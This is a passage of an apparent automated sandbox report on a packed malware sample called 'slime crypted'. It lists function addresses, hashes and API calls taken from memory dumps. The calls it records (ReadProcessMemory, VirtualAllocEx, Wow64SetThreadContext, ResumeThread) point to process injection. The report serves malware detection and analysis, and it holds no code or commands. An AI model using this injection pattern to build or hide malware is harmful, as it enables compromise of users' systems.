Opcode ID: 1f290ceac3a3b369d9f63142bf3c341c41e419f3a9fb5609b90e4780414a0d5c
Instruction ID: be2f0884632d7f9aaf019e12bcea8e3866a70f2e648fd44e7a94f6afc8e6d39d
Opcode Fuzzy Hash: 1f290ceac3a3b369d9f63142bf3c341c41e419f3a9fb5609b90e4780414a0d5c
Instruction Fuzzy Hash: BA2105B59003599FCF10DFAAC985BEEBBF5FF48310F10842AE919A7250D7789944CBA4

Function 07278E09 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07278E90

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 863e99f77aba77d623e66bb7ecddbc4f5ac720300e62a5d9c1033b72f677687a
Instruction ID: d63e4e1427cd35bca0ab84735f80803b1cc681f69dd8e08288659507176e248f
Opcode Fuzzy Hash: 863e99f77aba77d623e66bb7ecddbc4f5ac720300e62a5d9c1033b72f677687a
Instruction Fuzzy Hash: 4B2128B5C003599FCB10DFAAD885AEEFBF5FF48320F10842AE519A7250D7789944CBA5

Function 07278B81 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07278C06

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 39b09c0da8ed6779bab3e1cd09c38bf492752783d9cb3dcf3ebf818ce6c675e8
Instruction ID: b9a5751b9ffc70c7412789de4e323e3a4372c3b8925ffd5f44f1a0eee3a71321
Opcode Fuzzy Hash: 39b09c0da8ed6779bab3e1cd09c38bf492752783d9cb3dcf3ebf818ce6c675e8
Instruction Fuzzy Hash: FE2137B5D003098FDB14DFAAC5857EEBBF4EF48320F14842AD419A7240DB78A985CFA1

Function 0109D7C1 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0109D84F

Memory Dump Source

Source File: 00000000.00000002.2047500903.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_slime crypted.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f401c5d8854a00b8436113d6a7e8c0b38ad88ad7c829bddec65a3b52bf50ee48
Instruction ID: dc88b9820eeed56e0cd42ccfbcb2c3f58b14e33cd630b318b618c6e91a04054b
Opcode Fuzzy Hash: f401c5d8854a00b8436113d6a7e8c0b38ad88ad7c829bddec65a3b52bf50ee48
Instruction Fuzzy Hash: D221E3B5D002489FDB10CFAAD584AEEBFF5FB48320F14806AE958A7310D379A945DF60

Function 07278E10 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07278E90

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ee259c3b36e58525730a6f7d8532f77caad17fb7395b0fe85a82575f77591634
Instruction ID: a5339186cdcb582299877d52d014f47422da57da8620a188c9471b850f4ada5a
Opcode Fuzzy Hash: ee259c3b36e58525730a6f7d8532f77caad17fb7395b0fe85a82575f77591634
Instruction Fuzzy Hash: 972125B1C002499FCB10DFAAC884AEEFBF5FF48320F10842AE519A7250D7789940CBA5

Function 07278B88 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07278C06

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 25cc3ec3c907c9f3aed3d85010f651de222cd80f0a2c86897e076411f8b4e485
Instruction ID: 504b6a9efefa0886ff6ba9eada2e9a4724cf9317c9053c65318a604cc9a47dcf
Opcode Fuzzy Hash: 25cc3ec3c907c9f3aed3d85010f651de222cd80f0a2c86897e076411f8b4e485
Instruction Fuzzy Hash: F22135B5D003098FDB14DFAAC5857EEBBF4EF48320F14842AD419A7240CB78A985CFA0

Function 0109D7C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0109D84F

Memory Dump Source

Source File: 00000000.00000002.2047500903.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_slime crypted.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9c2c4a03fb68d5816add45710648229b133aa9cee88cb5c6af1bc86d5a615ef4
Instruction ID: 83639658b50e6396c6372b2d81b3889009c774e27fa4df2c51985b9a92d3bacd
Opcode Fuzzy Hash: 9c2c4a03fb68d5816add45710648229b133aa9cee88cb5c6af1bc86d5a615ef4
Instruction Fuzzy Hash: 8521E4B5D002489FDB10CF9AD584ADEBFF8FB48320F14805AE918A7310D378A940CFA4

Function 07201940 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 072019B9

Memory Dump Source

Source File: 00000000.00000002.2050234132.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_slime crypted.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 1d226afa701dccd3f8e0174dc0fa9755a855fe96b54186f26e0ffcead7b7ba27
Instruction ID: 493304d9885e9af8a50029cee5644d17025f96af55c16b63ff0f54f2eb164cef
Opcode Fuzzy Hash: 1d226afa701dccd3f8e0174dc0fa9755a855fe96b54186f26e0ffcead7b7ba27
Instruction Fuzzy Hash: C02129B59002198FDB14CF9AC844BEEFBF5FB88320F14842AD458A3290D778A945CFA5

Function 07201948 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 072019B9

Memory Dump Source

Source File: 00000000.00000002.2050234132.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_slime crypted.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 479dea019d6f04ab6cde40cc3eabb7fe46671fbc6d976bf40de3f0ce8bb64579
Instruction ID: b2cb9439ad8d4685e7f7c4cd379a4d0b9551e355b4acdb19db0cebe6c60b0907
Opcode Fuzzy Hash: 479dea019d6f04ab6cde40cc3eabb7fe46671fbc6d976bf40de3f0ce8bb64579
Instruction Fuzzy Hash: 382129B59002098FDB14CF9AC844BEEFBF5FB88320F148429D458A3290D778A945CFA5

Function 053D1D31 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049393981.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_slime crypted.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 76ccd12cf10cb707ea6563edfb0cc6e478aea31a792c6eeb1b52541cff8d8e7f
Instruction ID: be5305c2a9933a053b272f02455d95b679b084118f733b34a462f537dc23d25a
Opcode Fuzzy Hash: 76ccd12cf10cb707ea6563edfb0cc6e478aea31a792c6eeb1b52541cff8d8e7f
Instruction Fuzzy Hash: 9F118BB68083448FDB01DF98D44479AFFF4EF5A214F15848AD889AB252C378A905CB71

Function 07278C59 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07278CCE

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 179cfc09fb712c66aeb7b868c44abb8914393bd689dc4dc9e3142a28e6e219f6
Instruction ID: 4565b5b48300fb9bb9436f4c72270e369dd0d81839e14e32de1859c80acc22a3
Opcode Fuzzy Hash: 179cfc09fb712c66aeb7b868c44abb8914393bd689dc4dc9e3142a28e6e219f6
Instruction Fuzzy Hash: 721159B68002499FCB14DFAAD844AEFBFF5FF48320F14841AE519A7250CB75A540CFA0

Function 07278C60 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07278CCE

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ab2d314e48c697d84f3079d8abf7d795b95d93a3bb6d43137b32bdb88aa7ef26
Instruction ID: 5dc35c3d3d6310e0d3f41a18efa427633b97e270d67812dd14b9c4fa7d89995e
Opcode Fuzzy Hash: ab2d314e48c697d84f3079d8abf7d795b95d93a3bb6d43137b32bdb88aa7ef26
Instruction Fuzzy Hash: 431137B58002499FCB14DFAAC944AEFBFF5FF48320F148419E519A7250C779A540CFA0

Function 07278AD0 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07278B3A

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 375400d4bbb76670d921cb5f1b6ceb8210be932b3344ae7c83076d76359b3a57
Instruction ID: 443927871fc4fcf78e17dc2d4ab18474fd3ed3275fd83e3c8731cda631a732ff
Opcode Fuzzy Hash: 375400d4bbb76670d921cb5f1b6ceb8210be932b3344ae7c83076d76359b3a57
Instruction Fuzzy Hash: 7F1158B5C002498FCB20DFAAD4457EEFBF4EF88320F248419D519A7240CB79A941CFA5

Function 07278AD8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07278B3A

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 74f697a1e112503d23121b7a9e613ba601b605110ae92c13b20ee954b66ba0ef
Instruction ID: 33784f8d07c2aa11804ed65f1609aa17b06c37814a46de0845203adad64e215d
Opcode Fuzzy Hash: 74f697a1e112503d23121b7a9e613ba601b605110ae92c13b20ee954b66ba0ef
Instruction Fuzzy Hash: 1A1136B5D002498FCB20DFAAC4457EEFBF5EF88324F248819D519A7240CB79A945CFA4

Function 0109B4D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0109B53E

Memory Dump Source

Source File: 00000000.00000002.2047500903.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_slime crypted.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bac04629d5fb63f636bb9a399c2ab965db2cdd35d9e008cbe6a776560167d9aa
Instruction ID: 6ce99999bcaf4c919de6a0b87641ed89e480f31529196c524b5f22541b00dd20
Opcode Fuzzy Hash: bac04629d5fb63f636bb9a399c2ab965db2cdd35d9e008cbe6a776560167d9aa
Instruction Fuzzy Hash: FA1110B5C002498FDB10CF9AD444BDEFBF4EF88320F14846AD568A7210D379A545CFA1

Function 053D2015 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 053D2075

Memory Dump Source

Source File: 00000000.00000002.2049393981.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_slime crypted.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 1a211cd52399bbd5f07343f0049a3c16111d6cd3b342808efb4f5746aeec094e
Instruction ID: bb52e45ace11c4599326a0645aed9adfd41f4cf925d5a63dec29518992f6fdbc
Opcode Fuzzy Hash: 1a211cd52399bbd5f07343f0049a3c16111d6cd3b342808efb4f5746aeec094e
Instruction Fuzzy Hash: 8A1106B58002498FDB10DF99D585BEFFBF4EB48320F24855AE959A3300C375A944CFA1

Function 053D2010 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 053D2075

Memory Dump Source

Source File: 00000000.00000002.2049393981.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_slime crypted.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 1cd8119c397a8be8db05d5612567b18014054d3ebf46b9097fbcaa8ca6587466
Instruction ID: 502f647563f94fb89b8bcc447e6bd41336dfbfc8f8be6843517a28316ba39e7a
Opcode Fuzzy Hash: 1cd8119c397a8be8db05d5612567b18014054d3ebf46b9097fbcaa8ca6587466
Instruction Fuzzy Hash: 1711F5B58002499FDB10DF99D485BEEFBF4EB48320F24851AE959A7340C379A944CFA1

Function 072008A2 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 072008FD

Memory Dump Source

Source File: 00000000.00000002.2050234132.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_slime crypted.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 37c0fcc5215ee876fb0bac82a9aaf30714bef00258a5fae0551ece129f2e6079
Instruction ID: c7a622a432c14cbd9d7afff849e75e7c3270419980f86a125ee8dae13f128d62
Opcode Fuzzy Hash: 37c0fcc5215ee876fb0bac82a9aaf30714bef00258a5fae0551ece129f2e6079
Instruction Fuzzy Hash: 631115B59003498FDB20DF9AD445BDEBFF4EB48320F108419D518A7350C378A584CFA5

Function 053D2018 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 053D2075

Memory Dump Source

Source File: 00000000.00000002.2049393981.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_slime crypted.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: f7a577058051cb98304cb37dde0697641fc7805198440182e5602bbcc4325b77
Instruction ID: fbb72312e60764ed7e2d25f461056727a1a259c9c9395989d0100adbd1e83e24
Opcode Fuzzy Hash: f7a577058051cb98304cb37dde0697641fc7805198440182e5602bbcc4325b77
Instruction Fuzzy Hash: BC11D3B98002499FDB10DF9AD585BDFFBF8EB48320F10851AE919A7350C379A944CFA5

Function 072008A8 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 072008FD

Memory Dump Source

Source File: 00000000.00000002.2050234132.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_slime crypted.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 046a207b003f26ed1d045ce576bfc2c573309c866a15555ac035e3ee2987db49
Instruction ID: 288202a1eede48aafea0064001f599fc71658dbc63872a9257eef389cb696043
Opcode Fuzzy Hash: 046a207b003f26ed1d045ce576bfc2c573309c866a15555ac035e3ee2987db49
Instruction Fuzzy Hash: BF1112B59003498FDB20DF9AD444BDEBBF8EB48320F208419D518A3250C378AA44CFA5

Function 071752B0 Relevance: 1.5, Strings: 1, Instructions: 230COMMON

Download Yara Rule

Strings

,aq, xrefs: 071754E8

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: ,aq
API String ID: 0-3092978723
Opcode ID: a5a21fb996e8038f9149051ffd1548eaf20f44cc49cb572ff76f1089fdc82440
Instruction ID: 2a1f2eb514f14f5d0764c9c74e0d3911a1292cb869f23cc983cb0f7c33203b9f
Opcode Fuzzy Hash: a5a21fb996e8038f9149051ffd1548eaf20f44cc49cb572ff76f1089fdc82440
Instruction Fuzzy Hash: 877150707102118FC719AF79D898A2A7BFBAF89715B1544AAE506CB3B1DF70DC41CB50

Function 0717C448 Relevance: 1.5, Strings: 1, Instructions: 221COMMON

Download Yara Rule

Strings

sJ, xrefs: 0717C5A9

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: sJ
API String ID: 0-1982469671
Opcode ID: 58a83aef751361134fb56f222bee9ecfa30fb35f3f05f5f0ba6d846fc79d83fe
Instruction ID: 5c42b6d62258c7f288627b5bcf77acb55012ae4175eed8ff42a772ce5fc90925
Opcode Fuzzy Hash: 58a83aef751361134fb56f222bee9ecfa30fb35f3f05f5f0ba6d846fc79d83fe
Instruction Fuzzy Hash: 91816FB0A003059FC715DF69C994A9EB7F6FF85300B108569E44AAB3A4DB70EC05CB90

Function 07179220 Relevance: 1.5, Strings: 1, Instructions: 203COMMON

Download Yara Rule

Strings

4']q, xrefs: 07179306

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 3e28e453f1f5cd3836e885babef9a40bb736ddc652a82f7dae7930619e53d2fa
Instruction ID: 1a61ea91abd031c0ddbb72b1b4d7968dbe4d88dd4ccd4532262e39e17b54f331
Opcode Fuzzy Hash: 3e28e453f1f5cd3836e885babef9a40bb736ddc652a82f7dae7930619e53d2fa
Instruction Fuzzy Hash: DA813CB0A00206CFDB29DFB9D59966EBBF6EF84340F248529D456AB3D4DF34A805CB40

Function 07179210 Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

4']q, xrefs: 07179306

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 08c958b9af52d7299f4ee128497a267e9154f3a92bcfe601872e66165806d9e5
Instruction ID: 907b70194ef87c6475ee7b3e00d95f9c4274929afca5fd5c81560584c37a7278
Opcode Fuzzy Hash: 08c958b9af52d7299f4ee128497a267e9154f3a92bcfe601872e66165806d9e5
Instruction Fuzzy Hash: 02613EB0A00206CFDB25DFB5D59966EBBF6FF88300F248529D856A73D4DB34A845CB40

Function 0717C098 Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

$]q, xrefs: 0717C0E4

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: 08bbd7dfaf769a03fb3f4286782adb64f1f4447d40b6e67e563d68654748eb3d
Instruction ID: 16972bdff5ecf0a4e1fce644b2d5763b05de477bcbcd62e551e25fe8837273b8
Opcode Fuzzy Hash: 08bbd7dfaf769a03fb3f4286782adb64f1f4447d40b6e67e563d68654748eb3d
Instruction Fuzzy Hash: A4613F75700206CFC725DFA9D958AADB7B9FF88711F218069E816E7294DB31DC41CBA0

Function 0717B9D8 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

$Ykq, xrefs: 0717C067

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: $Ykq
API String ID: 0-3430023564
Opcode ID: a728cb65b8675163ac7b2e48db6a0566c13247f55acbddd8dfba04b9c798f0ec
Instruction ID: a07d1649a8e52ef1ebffae01c7fb45c4e4106c2fbf2c0e113305576aa019ef8f
Opcode Fuzzy Hash: a728cb65b8675163ac7b2e48db6a0566c13247f55acbddd8dfba04b9c798f0ec
Instruction Fuzzy Hash: DA5172F0B18207CFCB3A9A69C48463B7BF2EF85644F154829D902CB299EB34D981C795

Function 07176A70 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

,aq, xrefs: 07176AE6

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: ,aq
API String ID: 0-3092978723
Opcode ID: 964ab6a38708894edecda621ad281e24fde39ed7c3c42be217a40f21ae0a7079
Instruction ID: 1f986b42b4f1386432de88c00d0b209916e6f4f2123512871f5aae3babf11e37
Opcode Fuzzy Hash: 964ab6a38708894edecda621ad281e24fde39ed7c3c42be217a40f21ae0a7079
Instruction Fuzzy Hash: 195109747046008FC318DB3DC5989267BF6AF8A71476589A9E506CF3BACB35EC41CBA1

Function 07176A60 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

,aq, xrefs: 07176AE6

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: ,aq
API String ID: 0-3092978723
Opcode ID: 88bfc4772c338583676411d7b09ae9e0c5a0e13184a70d3555f0abd8dfe9e1bd
Instruction ID: afd05b9b32ffc7d77e4a93b26a11b8358ba6d086e011a9187fb4c8da8a0b9bc9
Opcode Fuzzy Hash: 88bfc4772c338583676411d7b09ae9e0c5a0e13184a70d3555f0abd8dfe9e1bd
Instruction Fuzzy Hash: 8741F9747045008FC318AB3DD59492677F7AF89715B6588A8E106CF3B9DB36DC42CBA1

Function 0717B510 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

4']q, xrefs: 0717B5C3

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 420ad555c6efb189dfca73a48df077b4febeacb550a62aa40c78589c44208b9f
Instruction ID: 36b979f1ce4549296fb4bc386b8fde7bf766c55fa2104d41330f928bcb09231a
Opcode Fuzzy Hash: 420ad555c6efb189dfca73a48df077b4febeacb550a62aa40c78589c44208b9f
Instruction Fuzzy Hash: CF318DB1604209CFCB24DF68D484AAA7BF6FF49310B6544A9E806DB3A1CB30ED41CB60

Function 07174B21 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

4']q, xrefs: 07174B8D

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: e34bbc4f3c93c01d3447e5b2fe9cd67d501e8987381ed578f36573483f87a278
Instruction ID: 82e7aa081d07daede107938c957ec731823bd9472ca693d57068ac513e650d95
Opcode Fuzzy Hash: e34bbc4f3c93c01d3447e5b2fe9cd67d501e8987381ed578f36573483f87a278
Instruction Fuzzy Hash: EC01DB323002019BC65EEB6CD551FAD77DBDFCA250B54892DE0468F354DF20AD0683A1

Function 07174B30 Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

4']q, xrefs: 07174B8D

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 42f2388c7979b287cfb5a5da658d22eafde9c78bc48dcfb059827e378a6b72e4
Instruction ID: b803cdda698100e634d51d5eb8da5ecafcb0c9692ed0073fbde9d28456d57481
Opcode Fuzzy Hash: 42f2388c7979b287cfb5a5da658d22eafde9c78bc48dcfb059827e378a6b72e4
Instruction Fuzzy Hash: 64F090323406018FC659EB28E550DAE77DBEFCA2507518A29D04A8B354EF24EC0687A1

Function 071B0048 Relevance: 1.1, Instructions: 1113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050191643.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71b0000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 266f19f80903033379bc76d82e2bd32c0a64836b2fd15d68deb585c555612d6c
Instruction ID: 7c5694cfb81b033bf2e29c13565e71705dadd2fcf4bf572e02cad3bf8d49a3f7
Opcode Fuzzy Hash: 266f19f80903033379bc76d82e2bd32c0a64836b2fd15d68deb585c555612d6c
Instruction Fuzzy Hash: 4A31C7B130434ACFD72A9A29D851BEB7BA5EFC9350F24846AE904CB2D1EB31D845C720

Function 07175518 Relevance: .6, Instructions: 593COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 010470d1a7d4cb7193026fef43cd79defa1f927b29eaa1fedc57984c698ec662
Instruction ID: 45d6aa21e33889e1b7b2116390cad76b2cb6fd393e42981820cce6a549a2f67d
Opcode Fuzzy Hash: 010470d1a7d4cb7193026fef43cd79defa1f927b29eaa1fedc57984c698ec662
Instruction Fuzzy Hash: C83257B47006018FCB19DF39C984A6ABBF6FF89700B5584A9E506CB3A6DB30ED45CB50

Function 0716FC20 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b597a8e608c01e5ba4e2d89439cb33470d1f756d46eefb9b7854b69e6bdf91a0
Instruction ID: 295cc1e5a2adaa37b11336633893668efb5e5af6f4ee80264b6a6d6d39167c32
Opcode Fuzzy Hash: b597a8e608c01e5ba4e2d89439cb33470d1f756d46eefb9b7854b69e6bdf91a0
Instruction Fuzzy Hash: 6741E675618225DFCB06CF68D548D6ABFFAEF44311B468496E809C7392CB34ED42CB91

Function 0717AEC0 Relevance: .4, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

